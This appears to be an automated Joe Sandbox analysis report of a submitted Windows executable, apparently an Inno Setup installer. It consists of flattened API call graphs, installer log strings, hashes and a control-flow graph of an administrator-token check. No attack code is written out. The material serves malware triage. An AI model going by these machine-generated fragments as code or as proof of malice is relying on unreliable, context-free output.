50655 4918f1 50643->50655 50656 4918c1 50643->50656 50647 447008 18 API calls 50644->50647 50646 4917ef 50783 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50646->50783 50650 49188f 50647->50650 50648 49182a 50651 49182e 50648->50651 50652 491863 50648->50652 50786 4528f4 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection DeleteFileA GetLastError 50650->50786 50654 447008 18 API calls 50651->50654 50785 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50652->50785 50659 49183d 50654->50659 50664 491930 50655->50664 50665 491900 50655->50665 50660 447008 18 API calls 50656->50660 50658 49189c 50787 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50658->50787 50711 452c6c 50659->50711 50663 4918ce 50660->50663 50788 45275c 50663->50788 50674 491978 50664->50674 50675 49193f 50664->50675 50670 447008 18 API calls 50665->50670 50666 4918ad 50666->50597 50667 49184d 50784 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50667->50784 50669 4918db 50795 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50669->50795 50673 49190d 50670->50673 50796 452dfc Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection RemoveDirectoryA GetLastError 50673->50796 50682 4919c0 50674->50682 50683 491987 50674->50683 50677 447008 18 API calls 50675->50677 50679 49194e 50677->50679 50678 49191a 50797 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50678->50797 50681 447008 18 API calls 50679->50681 50684 49195f 50681->50684 50687 4919d3 50682->50687 50694 491a89 50682->50694 50685 447008 18 API calls 50683->50685 50690 447288 5 API calls 50684->50690 50686 491996 50685->50686 50688 447008 18 API calls 50686->50688 50691 447008 18 API calls 50687->50691 50689 4919a7 50688->50689 50695 447288 5 API calls 50689->50695 50690->50597 50692 491a00 50691->50692 50693 447008 18 API calls 50692->50693 50696 491a17 50693->50696 50694->50597 50801 
446fac 18 API calls 50694->50801 50695->50597 50798 407de4 7 API calls 50696->50798 50698 491aa2 50802 42e8d8 FormatMessageA 50698->50802 50703 491a39 50704 447008 18 API calls 50703->50704 50705 491a4d 50704->50705 50799 408510 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50705->50799 50707 491a58 50800 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50707->50800 50709 491a64 50710->50648 50807 452710 50711->50807 50713 452c89 50713->50667 50714 452c85 50714->50713 50715 452cad MoveFileA GetLastError 50714->50715 50813 45274c 50715->50813 50718->50597 50720 406bc7 50719->50720 50721 406be0 50720->50721 50722 406be9 50720->50722 50723 403400 4 API calls 50721->50723 50816 403778 50722->50816 50724 406be7 50723->50724 50726 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50724->50726 50726->50597 50727->50545 50728->50597 50729->50553 50730->50597 50731->50554 50732->50597 50734 403738 50733->50734 50735 4072ba SetCurrentDirectoryA 50734->50735 50735->50564 50736->50597 50738 403738 50737->50738 50739 42c837 GetFullPathNameA 50738->50739 50740 42c843 50739->50740 50741 42c85a 50739->50741 50740->50741 50743 42c84b 50740->50743 50742 403494 4 API calls 50741->50742 50744 42c858 50742->50744 50745 4034e0 4 API calls 50743->50745 50746 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50744->50746 50745->50744 50746->50597 50747->50578 50748->50597 50749->50591 50750->50597 50823 42c7ac 50751->50823 50754 403778 4 API calls 50755 42c8d5 50754->50755 50756 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50755->50756 50756->50597 50838 42c684 50757->50838 50760 42c8f0 50762 403400 4 API calls 50760->50762 50761 42c8f9 50763 403778 4 API calls 50761->50763 50764 42c8f7 50762->50764 50763->50764 50765 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50764->50765 50765->50597 50766->50610 50767->50597 50769 42c7ac IsDBCSLeadByte 50768->50769 50770 42c94c 50769->50770 50771 403778 4 
API calls 50770->50771 50772 42c95e 50771->50772 50773 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50772->50773 50773->50597 50775 42c7ac IsDBCSLeadByte 50774->50775 50776 42c974 50775->50776 50777 403778 4 API calls 50776->50777 50778 42c985 50777->50778 50779 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50778->50779 50779->50597 50780->50637 50781->50597 50782->50646 50783->50597 50784->50597 50785->50597 50786->50658 50787->50666 50789 452710 2 API calls 50788->50789 50790 452772 50789->50790 50791 452776 50790->50791 50792 452794 CreateDirectoryA GetLastError 50790->50792 50791->50669 50793 45274c Wow64RevertWow64FsRedirection 50792->50793 50794 4527ba 50793->50794 50794->50669 50795->50597 50796->50678 50797->50597 50798->50703 50799->50707 50800->50709 50801->50698 50803 42e8fe 50802->50803 50804 4034e0 4 API calls 50803->50804 50805 42e91b 50804->50805 50806 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50805->50806 50806->50597 50808 45271e 50807->50808 50809 45271a 50807->50809 50810 452727 Wow64DisableWow64FsRedirection 50808->50810 50811 452740 SetLastError 50808->50811 50809->50714 50812 45273b 50810->50812 50811->50812 50812->50714 50814 452751 Wow64RevertWow64FsRedirection 50813->50814 50815 45275b 50813->50815 50814->50815 50815->50667 50817 4037aa 50816->50817 50818 40377d 50816->50818 50819 403400 4 API calls 50817->50819 50818->50817 50820 403791 50818->50820 50822 4037a0 50819->50822 50821 4034e0 4 API calls 50820->50821 50821->50822 50822->50724 50828 42c68c 50823->50828 50825 42c7c1 50826 42c80b 50825->50826 50835 42c454 IsDBCSLeadByte 50825->50835 50826->50754 50831 42c69d 50828->50831 50829 42c701 50832 42c6fc 50829->50832 50837 42c454 IsDBCSLeadByte 50829->50837 50831->50829 50833 42c6bb 50831->50833 50832->50825 50833->50832 50836 42c454 IsDBCSLeadByte 50833->50836 50835->50825 50836->50833 50837->50832 50839 42c68c IsDBCSLeadByte 50838->50839 50840 42c68b 50839->50840 
50840->50760 50840->50761 50841 41364c SetWindowLongA GetWindowLongA 50842 4136a9 SetPropA SetPropA 50841->50842 50843 41368b GetWindowLongA 50841->50843 50847 41f3ac 50842->50847 50843->50842 50844 41369a SetWindowLongA 50843->50844 50844->50842 50852 415280 50847->50852 50859 423c1c 50847->50859 50953 423a94 50847->50953 50848 4136f9 50853 41528d 50852->50853 50854 4152f3 50853->50854 50855 4152e8 50853->50855 50858 4152f1 50853->50858 50960 424b9c 13 API calls 50854->50960 50855->50858 50961 41506c 46 API calls 50855->50961 50858->50848 50864 423c52 50859->50864 50862 423cfc 50865 423d03 50862->50865 50866 423d37 50862->50866 50863 423c9d 50867 423ca3 50863->50867 50868 423d60 50863->50868 50878 423c73 50864->50878 50962 423b78 50864->50962 50869 423d09 50865->50869 50912 423fc1 50865->50912 50872 423d42 50866->50872 50873 4240aa IsIconic 50866->50873 50870 423cd5 50867->50870 50871 423ca8 50867->50871 50874 423d72 50868->50874 50875 423d7b 50868->50875 50876 423f23 SendMessageA 50869->50876 50877 423d17 50869->50877 50870->50878 50902 423cee 50870->50902 50903 423e4f 50870->50903 50880 423e06 50871->50880 50881 423cae 50871->50881 50882 4240e6 50872->50882 50883 423d4b 50872->50883 50873->50878 50879 4240be GetFocus 50873->50879 50884 423d88 50874->50884 50885 423d79 50874->50885 50971 4241a4 11 API calls 50875->50971 50876->50878 50877->50878 50904 423cd0 50877->50904 50933 423f66 50877->50933 50878->50848 50879->50878 50890 4240cf 50879->50890 50984 423b94 NtdllDefWindowProc_A 50880->50984 50891 423cb7 50881->50891 50892 423e2e PostMessageA 50881->50892 51006 424860 WinHelpA PostMessageA 50882->51006 50888 4240fd 50883->50888 50883->50904 50972 4241ec IsIconic 50884->50972 50980 423b94 NtdllDefWindowProc_A 50885->50980 50900 424106 50888->50900 50901 42411b 50888->50901 51005 41f004 GetCurrentThreadId 73A15940 50890->51005 50897 423cc0 50891->50897 50898 423eb5 50891->50898 50990 423b94 NtdllDefWindowProc_A 50892->50990 50907 423cc9 50897->50907 50908 423dde 
IsIconic 50897->50908 50909 423ebe 50898->50909 50910 423eef 50898->50910 50899 423e49 50899->50878 51007 4244e4 50900->51007 51013 42453c LocalAlloc TlsSetValue TlsGetValue TlsGetValue SendMessageA 50901->51013 50902->50904 50913 423e1b 50902->50913 50966 423b94 NtdllDefWindowProc_A 50903->50966 50904->50878 50970 423b94 NtdllDefWindowProc_A 50904->50970 50906 4240d6 50906->50878 50921 4240de SetFocus 50906->50921 50907->50904 50922 423da1 50907->50922 50915 423dfa 50908->50915 50916 423dee 50908->50916 50992 423b24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 50909->50992 50967 423b94 NtdllDefWindowProc_A 50910->50967 50912->50878 50924 423fe7 IsWindowEnabled 50912->50924 50985 424188 50913->50985 50983 423b94 NtdllDefWindowProc_A 50915->50983 50982 423bd0 15 API calls 50916->50982 50920 423e55 50928 423e93 50920->50928 50929 423e71 50920->50929 50921->50878 50922->50878 50981 422c5c ShowWindow PostMessageA PostQuitMessage 50922->50981 50924->50878 50931 423ff5 50924->50931 50927 423ef5 50932 423f0d 50927->50932 50968 41eeb4 GetCurrentThreadId 73A15940 50927->50968 50935 423a94 6 API calls 50928->50935 50991 423b24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 50929->50991 50930 423ec6 50937 423ed8 50930->50937 50993 41ef68 50930->50993 50945 423ffc IsWindowVisible 50931->50945 50940 423a94 6 API calls 50932->50940 50933->50878 50941 423f88 IsWindowEnabled 50933->50941 50943 423e9b PostMessageA 50935->50943 50999 423b94 NtdllDefWindowProc_A 50937->50999 50940->50878 50941->50878 50946 423f96 50941->50946 50942 423e79 PostMessageA 50942->50878 50943->50878 50945->50878 50947 42400a GetFocus 50945->50947 51000 412320 7 API calls 50946->51000 51001 4181f0 50947->51001 50950 42401f SetFocus 51003 415250 50950->51003 50954 423b1d 50953->50954 50955 423aa4 50953->50955 50954->50848 50955->50954 50956 423aaa EnumWindows 50955->50956 50956->50954 50957 423ac6 GetWindow GetWindowLongA 50956->50957 51117 423a2c GetWindow 50956->51117 50958 
423ae5 50957->50958 50958->50954 50959 423b11 SetWindowPos 50958->50959 50959->50954 50959->50958 50960->50858 50961->50858 50963 423b82 50962->50963 50964 423b8d 50962->50964 50963->50964 51014 408728 GetSystemDefaultLCID 50963->51014 50964->50862 50964->50863 50966->50920 50967->50927 50969 41ef39 50968->50969 50969->50932 50970->50878 50971->50878 50973 424233 50972->50973 50974 4241fd SetActiveWindow 50972->50974 50973->50878 51089 42365c 50974->51089 50978 42421a 50978->50973 50979 42422d SetFocus 50978->50979 50979->50973 50980->50878 50981->50878 50982->50878 50983->50878 50984->50878 51102 41db40 50985->51102 50988 4241a0 50988->50878 50989 424194 LoadIconA 50989->50988 50990->50899 50991->50942 50992->50930 50994 41ef70 IsWindow 50993->50994 50995 41ef9c 50993->50995 50996 41ef8a 50994->50996 50997 41ef7f EnableWindow 50994->50997 50995->50937 50996->50994 50996->50995 50998 402660 4 API calls 50996->50998 50997->50996 50998->50996 50999->50878 51000->50878 51002 4181fa 51001->51002 51002->50950 51004 41526b SetFocus 51003->51004 51004->50878 51005->50906 51006->50899 51008 4244f0 51007->51008 51009 42450a 51007->51009 51010 42451f 51008->51010 51011 4244f7 SendMessageA 51008->51011 51012 402648 4 API calls 51009->51012 51010->50878 51011->51010 51012->51010 51013->50899 51069 408570 GetLocaleInfoA 51014->51069 51019 408570 5 API calls 51020 40877d 51019->51020 51021 408570 5 API calls 51020->51021 51022 4087a1 51021->51022 51081 4085bc GetLocaleInfoA 51022->51081 51025 4085bc GetLocaleInfoA 51026 4087d1 51025->51026 51027 408570 5 API calls 51026->51027 51028 4087eb 51027->51028 51029 4085bc GetLocaleInfoA 51028->51029 51030 408808 51029->51030 51031 408570 5 API calls 51030->51031 51032 408822 51031->51032 51033 403450 4 API calls 51032->51033 51034 40882f 51033->51034 51035 408570 5 API calls 51034->51035 51036 408844 51035->51036 51037 403450 4 API calls 51036->51037 51038 408851 51037->51038 51039 4085bc GetLocaleInfoA 51038->51039 51040 40885f 
51039->51040 51041 408570 5 API calls 51040->51041 51042 408879 51041->51042 51043 403450 4 API calls 51042->51043 51044 408886 51043->51044 51045 408570 5 API calls 51044->51045 51046 40889b 51045->51046 51047 403450 4 API calls 51046->51047 51048 4088a8 51047->51048 51049 408570 5 API calls 51048->51049 51050 4088bd 51049->51050 51051 4088da 51050->51051 51052 4088cb 51050->51052 51054 403494 4 API calls 51051->51054 51053 403494 4 API calls 51052->51053 51070 408597 51069->51070 51071 4085a9 51069->51071 51072 4034e0 4 API calls 51070->51072 51073 403494 4 API calls 51071->51073 51074 4085a7 51072->51074 51073->51074 51075 403450 51074->51075 51076 403454 51075->51076 51079 403464 51075->51079 51078 4034bc 4 API calls 51076->51078 51076->51079 51077 403490 51077->51019 51078->51079 51079->51077 51080 402660 4 API calls 51079->51080 51080->51077 51082 4085d8 51081->51082 51082->51025 51098 423608 SystemParametersInfoA 51089->51098 51092 423675 ShowWindow 51094 423680 51092->51094 51095 423687 51092->51095 51101 423638 SystemParametersInfoA 51094->51101 51097 423b24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 51095->51097 51097->50978 51099 423626 51098->51099 51099->51092 51100 423638 SystemParametersInfoA 51099->51100 51100->51092 51101->51095 51105 41db64 51102->51105 51106 41db71 51105->51106 51109 41db4a 51105->51109 51106->51109 51114 40cc80 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 51106->51114 51108 41db8e 51108->51109 51110 41dba8 51108->51110 51111 41db9b 51108->51111 51109->50988 51109->50989 51115 41bd9c 11 API calls 51110->51115 51116 41b398 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 51111->51116 51114->51108 51115->51109 51116->51109 51118 423a4d GetWindowLongA 51117->51118 51119 423a59 51117->51119 51118->51119 51120 4804c6 51121 4804cf 51120->51121 51122 4804fa 51120->51122 51121->51122 51123 4804ec 51121->51123 51125 480539 51122->51125 51560 47efb0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 
51122->51560 51558 476b6c 188 API calls 51123->51558 51126 48055d 51125->51126 51129 480550 51125->51129 51130 480552 51125->51130 51133 480599 51126->51133 51134 48057b 51126->51134 51128 48052c 51561 47f018 42 API calls 51128->51561 51137 47eff4 42 API calls 51129->51137 51562 47f088 42 API calls 51130->51562 51131 4804f1 51131->51122 51559 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 51131->51559 51565 47ee48 24 API calls 51133->51565 51138 480590 51134->51138 51563 47f018 42 API calls 51134->51563 51137->51126 51564 47ee48 24 API calls 51138->51564 51142 480597 51143 4805a9 51142->51143 51144 4805af 51142->51144 51145 4805ad 51143->51145 51246 47eff4 51143->51246 51144->51145 51146 47eff4 42 API calls 51144->51146 51251 47c3a4 51145->51251 51146->51145 51633 47eadc 42 API calls 51246->51633 51248 47f00f 51634 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 51248->51634 51635 42d8a8 GetWindowsDirectoryA 51251->51635 51253 47c3c2 51254 403450 4 API calls 51253->51254 51255 47c3cf 51254->51255 51637 42d8d4 GetSystemDirectoryA 51255->51637 51257 47c3d7 51258 403450 4 API calls 51257->51258 51259 47c3e4 51258->51259 51639 42d900 51259->51639 51261 47c3ec 51262 403450 4 API calls 51261->51262 51263 47c3f9 51262->51263 51264 47c402 51263->51264 51265 47c41e 51263->51265 51695 42d218 51264->51695 51266 403400 4 API calls 51265->51266 51268 47c41c 51266->51268 51270 47c463 51268->51270 51272 42c8dc 5 API calls 51268->51272 51643 47c22c 51270->51643 51271 403450 4 API calls 51271->51268 51274 47c43e 51272->51274 51276 403450 4 API calls 51274->51276 51278 47c44b 51276->51278 51277 403450 4 API calls 51279 47c47f 51277->51279 51278->51270 51283 403450 4 API calls 51278->51283 51280 47c49d 51279->51280 51281 4035c0 4 API calls 51279->51281 51282 47c22c 8 API calls 51280->51282 51281->51280 51284 47c4ac 51282->51284 51283->51270 51285 403450 4 API calls 51284->51285 51286 47c4b9 51285->51286 51287 47c4e1 51286->51287 51288 42c40c 5 API 
calls 51286->51288 51289 47c548 51287->51289 51293 47c22c 8 API calls 51287->51293 51290 47c4cf 51288->51290 51291 47c572 51289->51291 51292 47c551 51289->51292 51295 4035c0 4 API calls 51290->51295 51654 42c40c 51291->51654 51296 42c40c 5 API calls 51292->51296 51297 47c4f9 51293->51297 51295->51287 51300 403450 4 API calls 51297->51300 51558->51131 51560->51128 51561->51125 51562->51126 51563->51138 51564->51142 51565->51142 51633->51248 51636 42d8c9 51635->51636 51636->51253 51638 42d8f5 51637->51638 51638->51257 51640 403400 4 API calls 51639->51640 51641 42d910 GetModuleHandleA GetProcAddress 51640->51641 51642 42d929 51641->51642 51642->51261 51705 42de2c 51643->51705 51645 47c252 51646 47c256 51645->51646 51647 47c278 51645->51647 51708 42dd5c 51646->51708 51648 403400 4 API calls 51647->51648 51650 47c27f 51648->51650 51650->51277 51652 47c26d RegCloseKey 51652->51650 51653 403400 4 API calls 51653->51652 51696 4038a4 4 API calls 51695->51696 51697 42d22b 51696->51697 51698 42d242 GetEnvironmentVariableA 51697->51698 51702 42d255 51697->51702 51743 42dbe0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51697->51743 51698->51697 51699 42d24e 51698->51699 51700 403400 4 API calls 51699->51700 51700->51702 51702->51271 51706 42de37 51705->51706 51707 42de3d RegOpenKeyExA 51705->51707 51706->51707 51707->51645 51711 42dc10 51708->51711 51712 42dc36 RegQueryValueExA 51711->51712 51713 42dc7b 51712->51713 51718 42dc59 51712->51718 51714 403400 4 API calls 51713->51714 51715 42dd47 51714->51715 51715->51652 51715->51653 51716 42dc73 51717 403400 4 API calls 51716->51717 51717->51713 51718->51713 51718->51716 51719 4034e0 4 API calls 51718->51719 51728 403744 51718->51728 51719->51718 51721 42dcb0 RegQueryValueExA 51721->51712 51722 42dccc 51721->51722 51722->51713 51732 4038a4 51722->51732 51725 42dd20 51727 403744 4 API calls 51727->51725 51729 40374a 51728->51729 51731 40375b 51728->51731 51730 4034bc 4 API calls 51729->51730 51729->51731 51730->51731 
[Execution graph: interactive call-graph widget; the raw node/edge listing is not reproduced. Each node is a function address inside the sample, annotated with the Windows APIs that function calls (or "N API calls" for a summarised callee); each edge is a call from one node to another. Windows APIs that appear on graph nodes: LocalAlloc, TlsSetValue, TlsGetValue, SetActiveWindow, MulDiv, KiUserCallbackDispatcher, SendMessageA, LoadStringA, CharNextA, GetDriveTypeA, IsDBCSLeadByte, SHPathPrepareForWriteA, RegOpenKeyExA, RegCloseKey, GetActiveWindow, GetFocus, SetFocus, RegisterClassA, CreateWindowExA, ShowWindow, GetWindowTextA, SelectObject, CreateFontIndirectA, DrawTextA, DrawTextW, MultiByteToWideChar, SetCurrentDirectoryA, GetModuleHandleA, GetCommandLineA, GetProcAddress, SetProcessDEPPolicy, GetVersion, GetVersionExA, GetCurrentThreadId, GetCurrentProcessId, GetSystemDefaultLCID, GetLocaleInfoA, NtdllDefWindowProc_A, CallWindowProcA, GetSysColor, SetTextColor, SetBkColor, CreateBrushIndirect, LoadLibraryA, LoadLibraryExA, WriteFile, GetClassInfoA, SetPropA, SetWindowPos, GetMenu, SetMenu, GetMenuItemCount, GetMenuStringA, GetMenuState, GetLastError, SetErrorMode. A few nodes call unresolved addresses in loaded modules (73A0A570, 73A0A480, 73A15CF0, 6F541CD0).]
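The execution graph above is exported as a flat token stream: a node is a decimal id followed by a hex function address and the Windows API names that function calls (or the summary "N API calls"), and an edge is `src->dst`. For triage the useful questions are "which functions call API X?" and "what call path leads there from a given root?". The script below is an added example written for this page, not Joe Sandbox tooling; it parses that format over a constructed excerpt (ids and addresses illustrative, not taken from any specific line) and answers both questions with a breadth-first search. It assumes node ids are decimal tokens, addresses are 6 to 8 hex digits, and the tokens `N API calls` carry no API name.

```python
"""Triage helper for a Joe Sandbox execution-graph dump.

Token stream format (as flattened in the report):
  <id> <hexaddr> [ApiName ...]        a node with its API calls
  <id> <hexaddr> N API calls          a node with summarised callees
  <src>-><dst>                        a call edge
Added example for this page; not Joe Sandbox code.
"""
import re
from collections import deque

# Assumption: addresses in the dump are 6-8 hex digits, node ids are decimal.
HEX_ADDR = re.compile(r"^[0-9a-fA-F]{6,8}$")
EDGE = re.compile(r"^(\d+)->(\d+)$")

# Constructed excerpt in the dump's format; ids/addresses are illustrative.
SAMPLE = """
56677 498578 56735 403344 56677->56735 56679 498586 56735->56679
56681 49858b 56741 406334 GetModuleHandleA GetProcAddress 56681->56741
56743 406357 GetProcAddress 56741->56743 56747 40637c SetProcessDEPPolicy 56743->56747
56746 406380 56747->56746 56748 409954 56746->56748
58408 40ce34 58411 406f18 WriteFile 58408->58411 56679->56681
56740 4056db 4 API calls 56679->56740
"""


def parse_graph(text):
    """Return (nodes, edges).

    nodes: {id: (addr_hex, set_of_api_names)}
    edges: {src_id: [dst_id, ...]} in order of appearance
    """
    nodes, edges = {}, {}
    toks = text.split()
    cur = None
    i = 0
    while i < len(toks):
        tok = toks[i]
        m = EDGE.match(tok)
        if m:
            edges.setdefault(m.group(1), []).append(m.group(2))
            i += 1
            continue
        nxt = toks[i + 1] if i + 1 < len(toks) else ""
        # A decimal token followed by a hex address opens a new node.
        if tok.isdigit() and HEX_ADDR.match(nxt):
            cur = tok
            nodes[cur] = (nxt.lower(), set())
            i += 2
            continue
        # Everything else attaches to the open node as an API name, except
        # the "N API calls" summary tokens, which name no API.
        if cur is not None and not tok.isdigit() and tok not in ("API", "calls"):
            nodes[cur][1].add(tok)
        i += 1
    return nodes, edges


def find_path(nodes, edges, root, api):
    """Breadth-first search from root; return the shortest path (as 'id@addr'
    strings) to the first node that calls `api`, or None if unreachable."""
    queue = deque([[root]])
    seen = {root}
    while queue:
        path = queue.popleft()
        node = path[-1]
        if node in nodes and api in nodes[node][1]:
            return [f"{n}@{nodes.get(n, ('?', set()))[0]}" for n in path]
        for nxt in edges.get(node, []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(path + [nxt])
    return None


def api_callers(nodes, api):
    """Sorted ids of every node whose function calls `api`."""
    return sorted(n for n, (_, apis) in nodes.items() if api in apis)


if __name__ == "__main__":
    nodes, edges = parse_graph(SAMPLE)
    print(f"{len(nodes)} nodes, {sum(len(v) for v in edges.values())} edges")
    for api in ("SetProcessDEPPolicy", "GetProcAddress", "WriteFile"):
        print(api, "callers:", api_callers(nodes, api))
        print("  path from 56677:", find_path(nodes, edges, "56677", api))
```

Run it against the full dump by pasting the graph text into `SAMPLE` (or reading it from a file) and changing the root id to the entry node of interest; unreachable APIs such as `WriteFile` in the excerpt come back as `None`, which is itself a signal that the API sits in a separate subgraph (for example a window procedure or a thread) rather than on the main start-up path.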
Strings
The messages below are the verbose install-log strings of the Inno Setup setup engine's file-installation routine (version, time-stamp, SHA-1 and Windows File Protection checks on an existing destination file), which identifies the sample as an Inno Setup-built installer; each xref is the virtual address in the sample that references the string.
• Installing the file., xrefs: 004711B1
• Will register the file (a DLL/OCX) later., xrefs: 004717AD
• Dest file exists., xrefs: 00470C63
• Incrementing shared file count (64-bit)., xrefs: 0047181A
• Existing file is protected by Windows File Protection. Skipping., xrefs: 00471094
• Skipping due to "onlyifdoesntexist" flag., xrefs: 00470C76
• Incrementing shared file count (32-bit)., xrefs: 00471833
• Version of our file: %u.%u.%u.%u, xrefs: 00470D98
• Time stamp of existing file: (failed to read), xrefs: 00470CDF
• Uninstaller requires administrator: %s, xrefs: 0047141D
• Same version. Skipping., xrefs: 00470F8D
• Existing file has a later time stamp. Skipping., xrefs: 00471077
• Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 00470F78
• -- File entry --, xrefs: 004709A3
• Version of our file: (none), xrefs: 00470DA4
• Version of existing file: (none), xrefs: 00470FA2
• @, xrefs: 00470A58
• Version of existing file: %u.%u.%u.%u, xrefs: 00470E24
• Non-default bitness: 32-bit, xrefs: 00470B63
• Will register the file (a type library) later., xrefs: 004717A1
• .tmp, xrefs: 0047125F
• Dest filename: %s, xrefs: 00470B3C
• Dest file is protected by Windows File Protection., xrefs: 00470B95
                                                                                                      • Skipping due to "onlyifdestfileexists" flag., xrefs: 004711A2
                                                                                                      • Non-default bitness: 64-bit, xrefs: 00470B57
                                                                                                      • Time stamp of existing file: %s, xrefs: 00470CD3
                                                                                                      • Time stamp of our file: %s, xrefs: 00470C43
                                                                                                      • , xrefs: 00470E77, 00471048, 004710C6
                                                                                                      • Failed to strip read-only attribute., xrefs: 0047117B
                                                                                                      • Installing into GAC, xrefs: 004719A2
                                                                                                      • Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 00470F6C
                                                                                                      • Existing file is a newer version. Skipping., xrefs: 00470EAA
                                                                                                      • InUn, xrefs: 004713ED
                                                                                                      • Stripped read-only attribute., xrefs: 0047116F
                                                                                                      • Couldn't read time stamp. Skipping., xrefs: 00470FDD
                                                                                                      • Time stamp of our file: (failed to read), xrefs: 00470C4F
                                                                                                      • Existing file's SHA-1 hash matches our file. Skipping., xrefs: 00470F5D
                                                                                                      • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 0047113E
                                                                                                      • Same time stamp. Skipping., xrefs: 00470FFD
                                                                                                      • User opted not to overwrite the existing file. Skipping., xrefs: 004710F5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing into GAC$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
                                                                                                      • API String ID: 0-4021121268
                                                                                                      • Opcode ID: 37ba39076e8f210f702745b7d33ab1b6cbc29d83952fc568139b6c082dd49221
                                                                                                      • Instruction ID: 00dcbbebc37e67597ddb11db3b00c056d98a3663d13b65a1c96947d1bb872b77
                                                                                                      • Opcode Fuzzy Hash: 37ba39076e8f210f702745b7d33ab1b6cbc29d83952fc568139b6c082dd49221
                                                                                                      • Instruction Fuzzy Hash: 2C927534A04288DFDB11DFA9C845BDDBBB5AF05304F5480ABE848AB392C7789E45CB59

                                                                                                      Control-flow Graph

                                                                                                      control_flow_graph 1546 42e0ac-42e0bd 1547 42e0c8-42e0ed AllocateAndInitializeSid 1546->1547 1548 42e0bf-42e0c3 1546->1548 1549 42e297-42e29f 1547->1549 1550 42e0f3-42e110 GetVersion 1547->1550 1548->1549 1551 42e112-42e127 GetModuleHandleA GetProcAddress 1550->1551 1552 42e129-42e12b 1550->1552 1551->1552 1553 42e152-42e16c GetCurrentThread OpenThreadToken 1552->1553 1554 42e12d-42e13b CheckTokenMembership 1552->1554 1557 42e1a3-42e1cb GetTokenInformation 1553->1557 1558 42e16e-42e178 GetLastError 1553->1558 1555 42e141-42e14d 1554->1555 1556 42e279-42e28f FreeSid 1554->1556 1555->1556 1559 42e1e6-42e20a call 402648 GetTokenInformation 1557->1559 1560 42e1cd-42e1d5 GetLastError 1557->1560 1561 42e184-42e197 GetCurrentProcess OpenProcessToken 1558->1561 1562 42e17a-42e17f call 4031bc 1558->1562 1573 42e218-42e220 1559->1573 1574 42e20c-42e216 call 4031bc * 2 1559->1574 1560->1559 1564 42e1d7-42e1e1 call 4031bc * 2 1560->1564 1561->1557 1563 42e199-42e19e call 4031bc 1561->1563 1562->1549 1563->1549 1564->1549 1576 42e222-42e223 1573->1576 1577 42e253-42e271 call 402660 CloseHandle 1573->1577 1574->1549 1580 42e225-42e238 EqualSid 1576->1580 1584 42e23a-42e247 1580->1584 1585 42e24f-42e251 1580->1585 1584->1585 1588 42e249-42e24d 1584->1588 1585->1577 1585->1580 1588->1577
                                                                                                      APIs
